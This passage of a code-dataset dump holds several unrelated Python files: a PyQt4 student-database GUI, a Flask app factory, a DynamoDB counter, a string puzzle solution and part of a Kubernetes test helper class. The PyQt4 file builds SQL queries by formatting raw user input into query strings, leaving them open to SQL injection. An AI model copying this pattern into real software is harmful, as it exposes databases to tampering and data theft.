remover_articulo()\n elif operacion == 3:\n ver_articulo()\n else:\n break\n\n","sub_path":"ProgOrientadaObjetos/mis scripts/Lista de compras.py","file_name":"Lista de compras.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"17721193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt4 import QtCore, QtGui, QtSql\nfrom login import Ui_Login\nfrom add import Ui_Add\nfrom delete import Ui_Del\nfrom gui import Ui_MainWindow\nfrom search import Ui_Search\nfrom update import Ui_Update\n\n############################ LOGIN WINDOW #####################################\n\nclass login(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.loginw = Ui_Login()\n self.loginw.setupUi(self)\n \n self.connect(self.loginw.buttonBox, QtCore.SIGNAL('accepted()'), self.ingresa)\n \n def ingresa(self):\n user = self.loginw.userEdit.text()\n passw = self.loginw.passEdit.text()\n \n db = QtSql.QSqlDatabase.addDatabase(\"QPSQL\")\n db.setHostName(\"localhost\");\n db.setDatabaseName(\"escuela\");\n db.setUserName(user);\n db.setPassword(passw);\n db.setPort(5432);\n \n if db.open():\n 
self.principal = principal()\n self.principal.show()\n self.hide()\n else:\n QtGui.QMessageBox.warning(self, u\"Acceso incorrecto\",\n u\"El usuario y/o la contraseña ingresada no son correctos, revisalos\",QtGui.QMessageBox.Ok)\n \n############################ MAIN WINDOW ######################################\n \nclass principal(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n \n self.ventana = Ui_MainWindow()\n self.ventana.setupUi(self)\n self.model = QtSql.QSqlQueryModel(self)\n \n #Create Objects\n self.adding = adding()\n self.searching = searching()\n self.modifying = modifying()\n self.deleting = deleting()\n \n #TableView Initial \n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view = self.ventana.tableView\n self.view.setModel(self.model)\n \n #Toolbar SIGNAL's\n self.connect(self.ventana.actionAgregar, QtCore.SIGNAL('activated()'), self.agregar)\n self.connect(self.ventana.actionBuscar, QtCore.SIGNAL('activated()'), self.buscar)\n self.connect(self.ventana.actionEditar, QtCore.SIGNAL('activated()'), self.editar)\n self.connect(self.ventana.actionBorrar, QtCore.SIGNAL('activated()'), self.borrar)\n \n #Query SIGNAL's\n self.connect(self.adding, QtCore.SIGNAL('agregado'), self.insertar)\n self.connect(self.searching, QtCore.SIGNAL('buscado'), self.consultar)\n self.connect(self.modifying, QtCore.SIGNAL('editado'), self.actualizar)\n self.connect(self.deleting, QtCore.SIGNAL('borrado'), self.eliminar)\n\n ############### INSERT SQL Functions ####################### \n def agregar(self):\n self.adding.show()\n \n def insertar(self, q, k):\n cursor = QtSql.QSqlQuery()\n if cursor.exec_(q):\n cursor.exec_(k)\n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view.setModel(self.model)\n else:\n QtGui.QMessageBox.about(self, \"Privilegios insuficientes\", \"Este usuario no cuenta con los privilegios necesarios para realizar esta tarea\")\n \n ############### SELECT SQL Functions #######################\n def buscar(self):\n self.searching.show()\n \n def consultar(self,q):\n self.model.setQuery(q)\n self.view.setModel(self.model)\n \n ############### UPDATE SQL Functions ####################### \n def editar(self):\n self.modifying.show()\n \n def actualizar(self, q):\n cursor = QtSql.QSqlQuery() \n if cursor.exec_(q):\n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view.setModel(self.model)\n else:\n QtGui.QMessageBox.about(self, \"Privilegios insuficientes\", \"Este usuario no cuenta con los privilegios necesarios para realizar esta tarea\")\n \n ############### DELETE SQL Functions ####################### \n def borrar(self):\n self.deleting.show()\n \n def eliminar(self, q):\n cursor = QtSql.QSqlQuery()\n if cursor.exec_(q):\n self.model.setQuery(\"SELECT nombre, ap_paterno, ap_materno, edad, fecha_registro, grado, grupo FROM alumno JOIN escolares USING(id_alumno);\")\n self.view.setModel(self.model)\n else:\n QtGui.QMessageBox.about(self, \"Privilegios insuficientes\", \"Este usuario no cuenta con los privilegios necesarios para realizar esta tarea\")\n \nclass adding(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n \n self.vadd = Ui_Add()\n self.vadd.setupUi(self)\n \n self.connect(self.vadd.buttonBox, 
QtCore.SIGNAL('accepted()'), self.query)\n \n def query(self):\n stdntId = int(self.vadd.idEdit.text())\n name = self.vadd.nameEdit.text()\n ap = self.vadd.patEdit.text()\n am = self.vadd.matEdit.text()\n age = self.vadd.ageSpin.value()\n grade = int(self.vadd.gradeCombo.currentText())\n group = self.vadd.groupCompo.currentText()\n \n q = u\"INSERT INTO alumno VALUES (%d, '%s', '%s', '%s', %d);\" %(stdntId, name, ap, am, age)\n k = u\"INSERT INTO escolares (id_registro, id_alumno,grado,grupo) VALUES (%d, %d, %d, '%s');\" %(stdntId, stdntId, grade, group)\n self.close()\n self.emit(QtCore.SIGNAL('agregado'), q, k)\n \nclass searching(QtGui.QWidget):\n def __init__ (self):\n QtGui.QWidget.__init__(self)\n \n self.vsearch = Ui_Search()\n self.vsearch.setupUi(self)\n \n self.connect(self.vsearch.buttonBox, QtCore.SIGNAL('accepted()'), self.query)\n \n def query(self):\n info = self.vsearch.searchEdit.text()\n \n if self.vsearch.radioButton.isChecked():\n qry = 'WHERE alumno.id_alumno=%s' %(info)\n elif self.vsearch.gradeCheck.isChecked():\n qry = 'WHERE escolares.grado=%s;' %(info)\n elif self.vsearch.ageCheck.isChecked():\n qry = 'WHERE alumno.edad=%s;' %(info)\n elif self.vsearch.groupCheck.isChecked():\n qry = \"WHERE escolares.grupo='%s';\" %(info)\n elif self.vsearch.matCheck.isChecked():\n qry = \"WHERE alumno.ap_materno='%s';\" %(info)\n elif self.vsearch.nameCheck.isChecked():\n qry = \"WHERE alumno.nombre='%s';\" %(info)\n elif self.vsearch.patCheck.isChecked():\n qry = \"WHERE alumno.ap_paterno='%s';\" %(info)\n \n q = '''SELECT alumno.id_alumno, alumno.nombre, alumno.ap_paterno, alumno.ap_materno, alumno.edad, escolares.fecha_registro, escolares.grado, escolares.grupo\nFROM alumno, escolares\n%s''' %(qry)\n self.close()\n self.emit(QtCore.SIGNAL('buscado'), q)\n\nclass modifying(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n \n self.vupdate = Ui_Update()\n self.vupdate.setupUi(self)\n \n self.connect(self.vupdate.buttonBox, QtCore.SIGNAL('accepted()'), self.query)\n self.connect(self.vupdate.checkBox, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_2, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_3, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_4, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_5, QtCore.SIGNAL('clicked()'), self.activar)\n self.connect(self.vupdate.checkBox_6, QtCore.SIGNAL('clicked()'), self.activar)\n \n def activar(self):\n if self.vupdate.checkBox.isChecked():\n self.vupdate.nameEdit.setEnabled(True)\n else:\n self.vupdate.nameEdit.setEnabled(False)\n \n if self.vupdate.checkBox_2.isChecked():\n self.vupdate.patEdit.setEnabled(True)\n else:\n self.vupdate.patEdit.setEnabled(False)\n\n if self.vupdate.checkBox_3.isChecked():\n self.vupdate.matEdit.setEnabled(True)\n else:\n self.vupdate.matEdit.setEnabled(False)\n if self.vupdate.checkBox_4.isChecked():\n self.vupdate.ageSpin.setEnabled(True)\n else:\n self.vupdate.ageSpin.setEnabled(False)\n \n if self.vupdate.checkBox_5.isChecked():\n self.vupdate.gradeCombo.setEnabled(True)\n else:\n self.vupdate.gradeCombo.setEnabled(False)\n\n if self.vupdate.checkBox_6.isChecked():\n self.vupdate.groupCompo.setEnabled(True)\n else:\n self.vupdate.groupCompo.setEnabled(False)\n \n def query(self):\n stdnt = self.vupdate.idEdit.text()\n if stdnt != '':\n if self.vupdate.checkBox.isChecked():\n name = self.vupdate.nameEdit.text()\n n = '''UPDATE alumno\nSET nombre='%s'\nWHERE 
id_alumno=%s;''' %(name,stdnt)\n else:\n n = ''\n \n if self.vupdate.checkBox_2.isChecked():\n pat = self.vupdate.patEdit.text()\n ap = '''UPDATE alumno\nSET ap_paterno='%s'\nWHERE id_alumno=%s;''' %(pat,stdnt)\n else:\n ap = ''\n \n if self.vupdate.checkBox_3.isChecked():\n mat = self.vupdate.matEdit.text()\n am = '''UPDATE alumno\nSET ap_materno='%s'\nWHERE id_alumno=%s;''' %(mat,stdnt)\n else:\n am = ''\n \n if self.vupdate.checkBox_4.isChecked():\n age = self.vupdate.ageSpin.value()\n e = '''UPDATE alumno\nSET edad=%d\nWHERE id_alumno=%s;''' %(age,stdnt)\n else:\n e = ''\n \n if self.vupdate.checkBox_5.isChecked():\n grade = self.vupdate.gradeCombo.currentText()\n grad = '''UPDATE escolares\nSET grado=%s\nWHERE id_alumno=%s;''' %(grade,stdnt)\n else:\n grad = ''\n \n if self.vupdate.checkBox_6.isChecked():\n group = self.vupdate.groupCompo.currentText()\n gr = '''UPDATE escolares\nSET grupo='%s'\nWHERE id_alumno=%s;''' %(group,stdnt)\n else:\n gr = ''\n \n q = n+ap+am+e+grad+gr\n self.close()\n self.emit(QtCore.SIGNAL('editado'), q)\n else:\n QtGui.QMessageBox.about(self, \"Datos incompletos\", \"Es necesario ingresar la ID del registro a modificar\")\n \nclass deleting(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n \n self.vdelete = Ui_Del()\n self.vdelete.setupUi(self)\n \n self.connect(self.vdelete.buttonBox, QtCore.SIGNAL('accepted()'), self.query)\n \n def query(self):\n info = self.vdelete.delEdit.text()\n \n if self.vdelete.radioButton.isChecked():\n q = '''DELETE FROM escolares\nWHERE id_alumno=%s;DELETE FROM alumno\nWHERE id_alumno=%s;''' %(info,info)\n elif self.vdelete.gradeCheck.isChecked():\n q = 'DELETE FROM escolares WHERE grado=%s;' %(info)\n elif self.vdelete.ageCheck.isChecked():\n q = 'DELETE FROM alumno WHERE edad=%s;' %(info)\n elif self.vdelete.groupCheck.isChecked():\n q = \"DELETE FROM escolares WHERE grupo='%s';\" %(info)\n elif self.vdelete.matCheck.isChecked():\n q = \"DELETE FROM alumno WHERE ap_materno='%s';\" %(info)\n elif self.vdelete.nameCheck.isChecked():\n q = \"DELETE FROM alumno WHERE nombre='%s';\" %(info)\n elif self.vdelete.patCheck.isChecked():\n q = \"DELETE FROM alumno WHERE ap_paterno='%s';\" %(info)\n \n self.close()\n self.emit(QtCore.SIGNAL('borrado'), q)\n \ndef main():\n app = QtGui.QApplication(sys.argv)\n inicia = login()\n inicia.show()\n sys.exit(app.exec_())\n \nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455020051","text":"# -*- coding: utf-8 -*-\n\"\"\"The app module, containing the app factory function.\"\"\"\nfrom flask import Flask, jsonify\nfrom myapp.views import home # cookiecutter\nfrom myapp.extension import db, redis\nfrom config import Config\n\n\ndef create_app(config_object=Config):\n app = Flask(__name__.split('.')[0], instance_relative_config=True)\n app.config.from_object(config_object)\n app.config.from_pyfile('config.py', silent=True)\n app._static_folder = \"myapp/static\" # set local static folder as default\n register_blueprint(app)\n register_errorhandlers(app)\n register_extensions(app)\n setup_periodic_tasks()\n return app\n\n\ndef register_blueprint(app):\n \"\"\"Register Flask Blueprint\"\"\"\n app.register_blueprint(home.home_blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n # If an 
HTTPException, pull the `code` attribute; default to 500\n error_code = getattr(error, 'code', 500)\n res = {\n 'status': 'error',\n 'message': '',\n 'code': ''\n }\n if error_code == 401:\n res['message'] = 'Unauthorized'\n res['code'] = '401'\n elif error_code == 403:\n res['message'] = 'Forbidden'\n res['code'] = '403'\n elif error_code == 404:\n res['message'] = 'Not Found'\n res['code'] = '404'\n elif error_code == 500:\n res['message'] = 'Internal Server Error'\n res['code'] = '500'\n # return render_template('{0}.html'.format(error_code)), error_code\n return jsonify(res)\n\n for errcode in [401, 403, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_extensions(app):\n db.init_app(app) # register mongoDB\n redis.init_app(app) # register redis\n","sub_path":"myapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554068646","text":"from typing import Set\n\nimport boto3\n\nfrom .reserved import RESERVED_KEYWORDS\nfrom .serializers import serialize, deserialize\n\n\nclass RetriesExceeded(Exception): pass\n\nclass Counter:\n\n def __init__(self, table,\n variable_name='current_count',\n client=None,\n endpoint_url=None,\n region_name=None,\n aws_access_key_id=None,\n aws_secret_access_key=None,\n aws_session_token=None,\n **kwargs):\n\n self.table = table\n self.variable_name = variable_name\n\n self._named_variables: Set[str] = set()\n\n self._key = {}\n\n if len(kwargs) > 2 or len(kwargs) == 0:\n raise ValueError(\"The key of the counter can only consist of a Hash Key and an optional Sort Key\")\n\n for key_name, key_value in kwargs.items():\n self._key[key_name] = serialize(key_value)\n\n self._internal_variable_name = self._name_variable(variable_name)\n\n if client:\n self._client = client\n else:\n self._client = boto3.client(\n 'dynamodb',\n endpoint_url=endpoint_url,\n region_name=region_name,\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key,\n aws_session_token=aws_session_token\n )\n\n def next(self, increment: int=1, retries=3):\n\n expression_attribute_names = {}\n\n if self._named_variables:\n expression_attribute_names.update({f\"#{var}\": var for var in self._named_variables})\n\n update_request = dict(\n TableName=self.table,\n Key=self._key,\n UpdateExpression=f\"ADD {self._internal_variable_name} :increment\",\n ExpressionAttributeValues={\n ':increment': {'N': str(increment)}\n },\n ReturnValues='UPDATED_NEW'\n )\n\n if expression_attribute_names:\n update_request['ExpressionAttributeNames'] = expression_attribute_names\n\n\n response = self._update_item(update_request, retries=retries)\n result = deserialize(response['Attributes'])\n return int(result[self.variable_name])\n\n def reset(self):\n return self.set(count=0)\n\n def set(self, count: int, retries=3):\n expression_attribute_names = {}\n\n if self._named_variables:\n expression_attribute_names.update({f\"#{var}\": var for var in self._named_variables})\n\n update_request = dict(\n TableName=self.table,\n Key=self._key,\n UpdateExpression=f\"SET {self._internal_variable_name} = :value\",\n ExpressionAttributeValues={\n ':value': {'N': str(count)}\n },\n ReturnValues='UPDATED_NEW'\n )\n\n if expression_attribute_names:\n update_request['ExpressionAttributeNames'] = expression_attribute_names\n\n\n response = self._update_item(update_request, retries=retries)\n result = deserialize(response['Attributes'])\n return 
int(result[self.variable_name])\n\n def _update_item(self, update_request, retries=0):\n try:\n return self._client.update_item(**update_request)\n except Exception as e:\n print(\"Retrying\", retries)\n if retries == 0:\n print(e)\n raise RetriesExceeded(\"Could not atomically increment {}. Retries exceeded\".format(update_request['TableName']))\n return self._update_item(update_request=update_request, retries=retries-1)\n\n def _name_variable(self, variable):\n if variable.upper() not in RESERVED_KEYWORDS:\n return variable\n\n self._named_variables.add(variable)\n\n return f\"#{variable}\"\n","sub_path":"dynamodb_counter/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568798173","text":"# -*- coding: utf-8 -*-\n\nfrom config import config\nfrom flask import Flask\n\nappConfig = config['default']\n\ndef create_app():\n app = Flask(__name__)\n\n app.config.from_mapping(\n SECRET_KEY = appConfig.secret_key,\n )\n \n appConfig.init_app(app)\n\n from . import hello\n app.register_blueprint(hello.bp)\n\n return app","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206083497","text":"'''\nLilah has a string, s, of lowercase English letters that she repeated infinitely many times.\nGiven an integer, n, find and print the number of letter a's in the first n letters of Lilah's infinite string.\nFor example, if the string s='abcac' and n=10, the substring we consider is abcacabcac, the first 10 characters of her infinite string. There are 4 occurrences of a in the substring.\n'''\nif __name__=='__main__':\n s = input()\n n = int(input())\n L = len(s)\n print(s.count('a') * (n//L) + s[:n % L].count('a'))\n","sub_path":"Interview Preparation kit/01. Warm up challenges/04. 
Repeated String.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"228419577","text":"from fabric.api import local, settings\n\nimport time\nimport re\nimport test\nimport ipaddress\nimport vnc_api_test\nimport uuid\nfrom tcutils.util import get_random_name, retry\nfrom k8s.pod import PodFixture\nfrom k8s.service import ServiceFixture\nfrom k8s.ingress import IngressFixture\nfrom k8s.namespace import NamespaceFixture\nfrom k8s.tls_secret import TLSSecretFixture\nfrom k8s.deployment import DeploymentFixture\nfrom k8s.network_policy import NetworkPolicyFixture\nfrom common.connections import ContrailConnections\nfrom common import create_public_vn\nfrom common.base import _GenericTestBaseMethods\nfrom vn_test import VNFixture\n\n\nK8S_SERVICE_IPAM = ['default-domain', 'default', 'service-ipam']\nK8S_PUBLIC_VN_NAME = '__public__'\nK8S_PUBLIC_FIP_POOL_NAME = '__fip_pool_public__'\n\n\nclass BaseK8sTest(test.BaseTestCase, _GenericTestBaseMethods, vnc_api_test.VncLibFixture):\n\n @classmethod\n def setUpClass(cls):\n super(BaseK8sTest, cls).setUpClass()\n cls.connections = ContrailConnections(cls.inputs,\n project_name=cls.inputs.admin_tenant,\n username=cls.inputs.admin_username,\n password=cls.inputs.admin_password,\n logger=cls.logger)\n cls.vnc_lib_fixture = cls.connections.vnc_lib_fixture\n cls.vnc_lib = cls.connections.vnc_lib\n cls.agent_inspect = cls.connections.agent_inspect\n cls.cn_inspect = cls.connections.cn_inspect\n cls.analytics_obj = cls.connections.analytics_obj\n cls.api_s_inspect = cls.connections.api_server_inspect\n cls.logger = cls.connections.logger\n cls.k8s_client = cls.connections.k8s_client\n cls.setup_namespace_isolation = False\n cls.public_vn = create_public_vn.PublicVn(connections=cls.connections,\n public_vn=K8S_PUBLIC_VN_NAME,\n public_tenant=cls.inputs.admin_tenant,\n logger=cls.logger,\n fip_pool_name=K8S_PUBLIC_FIP_POOL_NAME,\n api_option='contrail')\n\n # end setUpClass\n\n @classmethod\n def tearDownClass(cls):\n super(BaseK8sTest, cls).tearDownClass()\n # end tearDownClass\n\n def setup_http_service(self,\n name=None,\n namespace='default',\n labels=None,\n metadata=None,\n spec=None,\n type=None,\n external_ips=None,\n frontend_port=80,\n backend_port=80):\n '''\n A simple helper method to create a service\n\n Noticed that nginx continues to listen on port 80 even if target port\n is different. 
So, recommended not to change backend_port for now\n '''\n metadata = metadata or {}\n spec = spec or {}\n name = name or get_random_name('nginx-svc')\n metadata.update({'name': name})\n selector_dict = {}\n labels = labels or {}\n spec.update({\n 'ports': [\n {\n 'protocol': 'TCP',\n 'port': int(frontend_port),\n 'targetPort': int(backend_port)\n }\n ]\n })\n if labels:\n selector_dict = {'selector': labels}\n spec.update(selector_dict)\n if type:\n type_dict = {'type': type}\n spec.update(type_dict)\n if external_ips:\n external_ips_dict = {'external_i_ps': external_ips}\n spec.update(external_ips_dict)\n\n return self.useFixture(ServiceFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n # end setup_http_service\n\n def setup_simple_nginx_ingress(self,\n service_name,\n name=None,\n namespace='default',\n service_port=80,\n **kwargs):\n default_backend = {'service_name': service_name,\n 'service_port': service_port}\n return self.setup_ingress(name=name,\n namespace=namespace,\n default_backend=default_backend,\n **kwargs)\n # end setup_simple_nginx_ingress\n\n def setup_ingress(self,\n name=None,\n namespace='default',\n metadata=None,\n default_backend=None,\n rules=None,\n spec=None,\n **kwargs):\n '''\n A very basic helper method to create an ingress\n\n '''\n if metadata is None: metadata = {}\n if spec is None: spec = {}\n if default_backend is None: default_backend = {}\n if rules is None: rules = []\n tls = kwargs.get('tls', None)\n name = name or get_random_name('nginx-ingress')\n metadata.update({'name': name})\n if default_backend:\n spec.update({'backend': default_backend})\n if rules:\n spec.update({'rules': rules})\n if tls:\n spec.update({'tls': tls})\n\n return self.useFixture(IngressFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n tls=tls))\n # end setup_ingress\n\n def setup_namespace(self,\n name=None,\n isolation = None,\n custom_isolation = False,\n fq_network_name = None):\n isolation = isolation or self.setup_namespace_isolation\n if custom_isolation == False:\n vn_fq_name = None\n return self.useFixture(NamespaceFixture(\n connections=self.connections,\n name=name, isolation=isolation,\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name))\n # end create_namespace\n\n def setup_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n labels=None,\n custom_isolation = False,\n fq_network_name = {},\n **kwargs):\n name = name or get_random_name('pod')\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n metadata['name'] = metadata.get('name') or name\n if labels:\n metadata['labels'] = metadata.get('labels', {})\n metadata['labels'].update(labels)\n return self.useFixture(PodFixture(\n connections=self.connections,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name,\n **kwargs))\n # end setup_pod\n\n def setup_nginx_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n container_port=80,\n labels=None,\n spec=None,\n custom_isolation = False,\n fq_network_name = {}):\n '''\n Noticed that nginx continues to listen on port 80 even if target port\n (container_port) is different\n '''\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n name = name or get_random_name('nginx-pod')\n if labels:\n metadata['labels'] = metadata.get('labels', {})\n 
metadata['labels'].update(labels)\n spec = spec or {\n 'containers': [\n {'image': 'nginx',\n 'ports': [\n {'container_port': int(container_port)}\n ],\n }\n ]\n }\n return self.setup_pod(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n shell='/bin/bash',\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name)\n\n # end setup_nginx_pod\n\n def verify_nginx_pod(self, pod, path=None):\n result = pod.verify_on_setup()\n if result:\n if path:\n pod.run_cmd('echo %s > /usr/share/nginx/html/index.html' % (pod.name)) \n cmd = \"cp /usr/share/nginx/html/index.html /usr/share/nginx/html/%s\" %(path)\n pod.run_cmd(cmd)\n else:\n pod.run_cmd('echo %s > /usr/share/nginx/html/index.html' % (\n pod.name))\n return result\n # end verify_nginx_pod\n\n def setup_busybox_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n labels=None,\n custom_isolation = False,\n fq_network_name = {}):\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n name = name or get_random_name('busybox-pod')\n spec = spec or {\n 'containers': [\n {'image': 'busybox',\n 'command': ['sleep', '1000000'],\n 'image_pull_policy': 'IfNotPresent',\n }\n ],\n 'restart_policy': 'Always',\n }\n return self.setup_pod(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n labels=labels,\n shell='/bin/sh',\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name)\n # end setup_busybox_pod\n\n def setup_ubuntuapp_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n labels=None):\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n name = name or get_random_name('ubuntuapp-pod')\n spec = spec or {\n 'containers': [\n {'image': 'ubuntu-upstart',\n 'command': ['sleep', '1000000'],\n 'image_pull_policy': 'IfNotPresent',\n }\n ],\n 'restart_policy': 'Always',\n }\n return self.setup_pod(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n labels=labels,\n shell='/bin/sh')\n # end setup_ubuntuapp_pod\n\n @retry(delay=1, tries=5)\n def validate_wget(self, pod, link, expectation=True, **kwargs):\n ret_val = self.do_wget(link, pod=pod, **kwargs)\n result = ret_val == expectation\n if result:\n self.logger.info('wget check of %s from %s passed' % (link,\n pod.name))\n else:\n self.logger.warn('wget check of %s from %s failed' % (link,\n pod.name))\n return result\n # end validate_wget\n\n def do_wget(self, link, pod=None, output_file='/dev/null', host='',\n timeout=5, return_output=False, tries=1,\n cert=None):\n '''\n Returns boolean by default\n Returns (boolean, output) if return_output is True\n '''\n host_str = ''\n cert_str = ''\n output = ''\n if host:\n host_str = '--header \"Host:%s\" ' % (host)\n if 'https' in link and not cert:\n cert_str = ' --no-check-certificate'\n cmd = 'wget %s %s -O %s -T %s -t %s %s' % (link, host_str, output_file,\n timeout, tries, cert_str)\n if not pod:\n with settings(warn_only=True):\n output = local(cmd, capture=True)\n pod_str = 'local'\n else:\n output = pod.run_cmd(cmd, shell='/bin/sh -l -c')\n pod_str = 'Pod %s' % (pod.name)\n if '100%' in output:\n self.logger.debug('[Pod %s] Cmd %s passed' % (pod_str, cmd))\n self.logger.debug('[Pod %s] Cmd output: %s' % (pod_str, output))\n result = True\n else:\n self.logger.debug('[Pod %s] Cmd %s failed. 
Output: %s' % (pod_str,\n cmd, output))\n self.logger.debug('[Pod %s] Cmd output: %s' % (pod_str, output))\n result = False\n if return_output:\n return (result, output)\n else:\n return result\n # end do_wget\n\n @retry(delay=1, tries=5)\n def validate_nginx_lb(self,\n lb_pods,\n service_ip,\n test_pod=None,\n host=None,\n path='',\n port='80',\n barred_pods=None,\n protocol=None,\n cert=None):\n '''\n From test_pod, run wget on http://<service_ip>:<port>/<path> and check\n if all the lb_pods respond to at least one of the requests over\n 5*len(lb_pods) attempts\n\n barred_pods : pods where the http requests should never be seen\n '''\n host_str = ''\n protocol = protocol or 'http'\n barred_pods = barred_pods or []\n attempts = len(lb_pods) * 5\n hit = {}\n hit_me_not = {}\n for x in lb_pods:\n hit[x.name] = 0\n for x in barred_pods:\n hit_me_not[x.name] = 0\n\n link = '%s://%s:%s/%s' % (protocol, service_ip, port, path)\n for i in range(0, attempts):\n (ret_val, output) = self.do_wget(link, pod=test_pod, host=host,\n output_file='-',\n return_output=True,\n cert=cert)\n for pod in lb_pods:\n if pod.name in output:\n hit[pod.name] += 1\n\n for pod in barred_pods:\n if pod.name in output:\n hit_me_not[pod.name] += 1\n if hit_me_not and 0 not in hit_me_not.values():\n self.logger.warn('HTTP request seems to have hit an unexpected '\n ' pod. Stats : %s' % (hit_me_not))\n return False\n\n if 0 not in hit.values():\n self.logger.info('Responses seen from all pods, lb seems fine.'\n 'Hits : %s' % (hit))\n return True\n if 0 in hit.values():\n msg = ('No http hit seen for one or more pods.'\n 'Pls check. Hits: %s' % (hit))\n self.logger.warn(msg)\n return False\n self.logger.info('Nginx lb hits seem to be ok: %s' % (hit))\n return True\n # end validate_nginx_lb\n\n def setup_update_policy(self,\n pod_selector=None,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n policy_types=None,\n ingress=None,\n egress=None,\n update=False,\n np_fixture=None):\n '''\n A helper method to create generic network policy\n Ex :\n ingress = [\n { 'from': [\n { 'pod_selector': {'role': 'frontend' }\n },\n { 'namespace_selector': {'a': 'b' }\n }\n ],\n 'ports': [ 'tcp/80', 'UDP/53' ]\n },\n ...\n ...\n ]\n egress = [\n { 'to': \n [\n {'ip_block': \n {\"cidr\" : \"1.2.3.4/24\"},\n },\n ],\n \"ports\" : [ 'tcp/80', 'UDP/53' ]\n },\n ...\n ...\n ]\n '''\n metadata = metadata or {}\n spec = spec or {}\n ingress = ingress or {}\n egress = egress or {}\n ingress_list = []\n egress_list = []\n name = name or get_random_name('np-')\n metadata.update({'name': name})\n selector_dict = {}\n pod_selector_dict = {}\n\n if pod_selector is not None:\n pod_selector_dict = {'match_labels': pod_selector}\n\n if ingress is not None:\n ingress_item_dict = {}\n for ingress_item in ingress:\n from_entries = []\n if ingress_item == {}:\n ingress_list.append({})\n break\n for from_item in ingress_item.get('from', {}):\n ingress_pod_dict = {}\n ingress_ns_dict = {}\n ingress_ip_block_dict = {}\n ingress_pod_selector = None\n ingress_ns_selector = None\n ingress_ip_block = None\n \n from_item_dict = from_item.get('pod_selector') or {}\n for k, v in from_item_dict.iteritems():\n if not ingress_pod_dict:\n ingress_pod_dict = {'match_labels': {}}\n ingress_pod_dict['match_labels'].update({k: v})\n ingress_pod_selector = {\n 'pod_selector': ingress_pod_dict}\n\n from_item_dict = from_item.get('namespace_selector') or {}\n for k, v in from_item_dict.iteritems():\n if not ingress_ns_dict:\n ingress_ns_dict = {'match_labels': {}}\n 
